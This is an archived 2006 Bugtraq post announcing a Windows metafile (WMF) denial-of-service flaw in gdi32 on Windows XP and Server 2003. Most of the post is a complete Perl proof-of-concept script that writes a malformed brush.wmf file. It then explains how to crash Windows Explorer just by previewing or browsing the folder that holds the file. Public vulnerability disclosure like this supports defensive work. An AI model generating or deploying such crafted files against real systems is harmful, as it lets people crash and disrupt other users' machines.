lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <921799310.20060806140218@gmail.com>
Date: Sun, 6 Aug 2006 14:02:18 +0400
From: cyanid-E <biz4rre@...il.com>
To: bugtraq@...urityfocus.com
Subject: 0-day XP SP2 wmf exploit


Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ